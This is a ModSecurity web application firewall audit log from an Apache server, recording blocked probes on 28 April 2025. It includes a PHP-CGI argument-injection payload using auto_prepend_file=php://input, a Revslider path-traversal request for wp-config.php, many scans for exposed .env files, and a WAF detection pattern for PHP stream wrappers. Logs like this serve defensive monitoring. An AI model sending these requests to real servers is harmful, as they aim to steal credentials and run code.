sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8012a63-Z-- --bc952f45-A-- [28/Apr/2025:17:38:30 +0700] aA9apsJruAEpaSEZ7DDm-gAAABg 103.236.140.4 47036 103.236.140.4 8181 --bc952f45-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 167.99.210.137 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 167.99.210.137 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --bc952f45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc952f45-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745836710187557 769 (- - -) Stopwatch2: 1745836710187557 769; combined=285, p1=253, p2=0, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc952f45-Z-- --5defac31-A-- [28/Apr/2025:18:00:03 +0700] aA9fs1T4soy9XydcuKbIvAAAAEc 103.236.140.4 52058 103.236.140.4 8181 --5defac31-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 46.101.111.185 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 46.101.111.185 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --5defac31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5defac31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745838003115258 909 (- - -) Stopwatch2: 1745838003115258 909; combined=366, p1=325, p2=0, p3=0, p4=0, p5=41, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5defac31-Z-- --42ccf10e-A-- [28/Apr/2025:19:57:44 +0700] aA97SFT4soy9XydcuKbxYgAAAEI 103.236.140.4 43364 103.236.140.4 8181 --42ccf10e-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 206.189.19.19 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 206.189.19.19 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --42ccf10e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --42ccf10e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745845064140788 963 (- - -) Stopwatch2: 1745845064140788 963; combined=455, p1=402, p2=0, p3=0, p4=0, p5=52, sr=130, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42ccf10e-Z-- --9a379451-A-- [28/Apr/2025:21:31:25 +0700] aA-RPcJruAEpaSEZ7DAjywAAAAo 103.236.140.4 46138 103.236.140.4 8181 --9a379451-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 157.230.19.140 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 157.230.19.140 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --9a379451-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a379451-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745850685734453 772 (- - -) Stopwatch2: 1745850685734453 772; combined=319, p1=288, p2=0, p3=0, p4=0, p5=31, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a379451-Z-- --53bdec61-A-- [28/Apr/2025:21:36:10 +0700] aA-SWsJruAEpaSEZ7DAnrgAAAAY 103.236.140.4 32838 103.236.140.4 8181 --53bdec61-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 147.139.141.27 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 147.139.141.27 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --53bdec61-C-- --53bdec61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --53bdec61-E-- --53bdec61-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745850970870959 4269 (- - -) Stopwatch2: 1745850970870959 4269; combined=2760, p1=438, p2=2289, p3=0, p4=0, p5=33, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53bdec61-Z-- --1a660637-A-- [28/Apr/2025:21:49:42 +0700] aA-VhlT4soy9XydcuKYFwgAAAE4 103.236.140.4 48126 103.236.140.4 8181 --1a660637-B-- GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --1a660637-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a660637-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745851782250491 833 (- - -) Stopwatch2: 1745851782250491 833; combined=316, p1=277, p2=0, p3=0, p4=0, p5=39, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a660637-Z-- --1110c909-A-- [28/Apr/2025:21:49:43 +0700] aA-Vh2j1i6BJZll4jGMa8gAAAII 103.236.140.4 48208 103.236.140.4 8181 --1110c909-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --1110c909-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1110c909-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745851783226841 775 (- - -) Stopwatch2: 1745851783226841 775; combined=282, p1=251, p2=0, p3=0, p4=0, p5=30, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1110c909-Z-- --12fff32d-A-- [28/Apr/2025:21:49:43 +0700] aA-Vh2j1i6BJZll4jGMa-AAAAIU 103.236.140.4 48266 103.236.140.4 8181 --12fff32d-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --12fff32d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12fff32d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745851783860304 677 (- - -) Stopwatch2: 1745851783860304 677; combined=213, p1=187, p2=0, p3=0, p4=0, p5=26, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12fff32d-Z-- --1b758d03-A-- [28/Apr/2025:21:49:44 +0700] aA-ViFT4soy9XydcuKYF0wAAAFE 103.236.140.4 48320 103.236.140.4 8181 --1b758d03-B-- GET /laravel/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --1b758d03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b758d03-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745851784504542 614 (- - -) Stopwatch2: 1745851784504542 614; combined=264, p1=240, p2=0, p3=0, p4=0, p5=24, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b758d03-Z-- --35399669-A-- [28/Apr/2025:21:49:44 +0700] aA-ViI_5LpLtj_OTfS9FaAAAAMc 103.236.140.4 48358 103.236.140.4 8181 --35399669-B-- GET /test/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --35399669-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --35399669-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745851784963478 811 (- - -) Stopwatch2: 1745851784963478 811; combined=311, p1=254, p2=0, p3=0, p4=0, p5=57, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35399669-Z-- --129d3644-A-- [28/Apr/2025:21:49:45 +0700] aA-ViY_5LpLtj_OTfS9FbAAAANU 103.236.140.4 48408 103.236.140.4 8181 --129d3644-B-- GET /admin/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --129d3644-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --129d3644-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745851785595860 857 (- - -) Stopwatch2: 1745851785595860 857; combined=304, p1=269, p2=0, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --129d3644-Z-- --39a08d3c-A-- [28/Apr/2025:21:49:46 +0700] aA-VisJruAEpaSEZ7DAyigAAAAQ 103.236.140.4 48466 103.236.140.4 8181 --39a08d3c-B-- GET /vendor/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --39a08d3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39a08d3c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745851786235939 772 (- - -) Stopwatch2: 1745851786235939 772; combined=265, p1=232, p2=0, p3=0, p4=0, p5=33, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39a08d3c-Z-- --d8989d4b-A-- [28/Apr/2025:21:49:46 +0700] aA-Vio_5LpLtj_OTfS9FcgAAAM4 103.236.140.4 48528 103.236.140.4 8181 --d8989d4b-B-- GET /sites/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --d8989d4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d8989d4b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745851786957353 622 (- - -) Stopwatch2: 1745851786957353 622; combined=217, p1=191, p2=0, p3=0, p4=0, p5=25, sr=52, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8989d4b-Z-- --23107a24-A-- [28/Apr/2025:21:49:47 +0700] aA-Vi8JruAEpaSEZ7DAykwAAAAA 103.236.140.4 48582 103.236.140.4 8181 --23107a24-B-- GET /blog/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --23107a24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --23107a24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745851787727027 850 (- - -) Stopwatch2: 1745851787727027 850; combined=328, p1=285, p2=0, p3=0, p4=0, p5=43, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23107a24-Z-- --78460a67-A-- [28/Apr/2025:21:49:48 +0700] aA-VjI_5LpLtj_OTfS9FdAAAAMo 103.236.140.4 48656 103.236.140.4 8181 --78460a67-B-- GET /system/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --78460a67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --78460a67-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745851788546617 771 (- - -) Stopwatch2: 1745851788546617 771; combined=297, p1=261, p2=0, p3=0, p4=0, p5=36, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78460a67-Z-- --ee607915-A-- [28/Apr/2025:21:49:49 +0700] aA-VjWj1i6BJZll4jGMbCgAAAJg 103.236.140.4 48694 103.236.140.4 8181 --ee607915-B-- GET /public/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --ee607915-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee607915-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745851789006086 667 (- - -) Stopwatch2: 1745851789006086 667; combined=278, p1=252, p2=0, p3=0, p4=0, p5=26, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee607915-Z-- --9bb82f13-A-- [28/Apr/2025:21:49:49 +0700] aA-VjWj1i6BJZll4jGMbDgAAAJQ 103.236.140.4 48736 103.236.140.4 8181 --9bb82f13-B-- GET /shop/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --9bb82f13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bb82f13-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745851789546857 786 (- - -) Stopwatch2: 1745851789546857 786; combined=289, p1=252, p2=0, p3=0, p4=0, p5=37, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bb82f13-Z-- --e6a86b25-A-- [28/Apr/2025:22:10:29 +0700] aA-aZcJruAEpaSEZ7DBDIAAAAAg 103.236.140.4 58084 103.236.140.4 8181 --e6a86b25-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.172.56.145 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.172.56.145 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --e6a86b25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; 